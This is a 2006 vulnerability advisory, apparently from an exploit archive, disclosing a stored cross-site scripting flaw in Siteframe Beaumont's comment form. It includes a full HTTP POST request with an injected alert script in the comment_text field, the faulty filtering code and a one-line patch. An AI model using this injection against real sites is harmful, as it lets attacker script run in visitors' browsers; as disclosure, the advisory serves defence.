siteframe_5.0.2_xss.txt

siteframe_5.0.2_xss.txt: Posted Feb 20, 2006; Authored by Kiki | Site kiki91.altervista.org; Siteframe Beaumont 5.0.1a suffers from a flaw that allows a remote cross site scripting attack.; tags | exploit, remote, xss; SHA-256 | 902ce8c37a6cd6f61a009656c9b99f43f27775b39c8b08fd6f93a2235da6445f; Download | Favorite | View

siteframe_5.0.2_xss.txt

Siteframe Beaumont 5.0.2 <== User Comment Cross-Site Scripting Vulnerability 

####################################

Information of Software: 

Software: Siteframe Beaumont 5.0.1a  
Site: http://www.siteframe.org/
Description of software: Siteframe is a lightweight content-management 
system designed for the rapid deployment of community-based websites. 
With Siteframe,a group of users can share stories and photographs, create blogs, 
send email to one another, and participate in group activities.

####################################

Bug:

Siteframe contains a flaw that allows a remote cross site scripting attack. 
The vulnerability is found in the user comment page and the user can modify 
the function GET and insert the XSS code

- http POST request

http://[target]/edit/Comment
POST /edit/Comment HTTP/1.1
Host: [target]
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; it-IT; rv:1.7.12) Gecko/20050919 Firefox/1.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: it,it-it;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 167
comment_id=&comment_user_id=554&comment_page_id=116&comment_reply_to=&comment_subject=Kiki&comment_text=Hi&_submitted=1

but we can modify the request POST in this way:

comment_id=&comment_user_id=554&comment_page_id=116&comment_reply_to=&comment_subject=Kiki&comment_text=<script>alert("lol");</script>&_submitted=1

---------------------------------------------------------

Example:

you can insert in the text post an XSS code or you can modify the request in this way:

comment_id=&comment_user_id=554&comment_page_id=116&comment_reply_to=&comment_subject=Kiki&comment_text=[XSS]&_submitted=1

---------------------------------------------------------

The bug is in this part of DataObject.class.inc

[...]
    // strip html
    if ($info['formatted'] == 'ANY')
        ; // anything is allowed
    else if ($info['formatted'])
        $val = strip_tags($val, config('allowed_html'));
    else if ($info['type'] != 'xml')
        $val = strip_tags($val);
[...]

- Patch

in includes/DataObject.class.inc, change this:

    if ($info['formatted'] == 'ANY')

to this:

    if (!strcasecmp($info['formatted'], 'ANY'))

####################################

Credit:

Author:  Kiki
e-mail: federico.sana@alice.it
web page: http://kiki91.altervista.org

####################################

Top Authors In Last 30 Days

Red Hat 263 files
indoushka 179 files
Jay Turla 150 files
Ubuntu 85 files
h00die 54 files
juan vazquez 43 files
sinn3r 41 files
H D Moore 31 files
Gentoo 25 files
Karn Ganeshen 23 files

File Archives

Systems

AIX (430)
Apple (2,115)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,125)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,592)
HPUX (881)
iOS (390)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,340)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (16,897)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,876)
UNIX (9,458)
UnixWare (188)
Windows (6,772)
Other

siteframe_5.0.2_xss.txt

siteframe_5.0.2_xss.txt

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

siteframe_5.0.2_xss.txt

Share This

siteframe_5.0.2_xss.txt

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems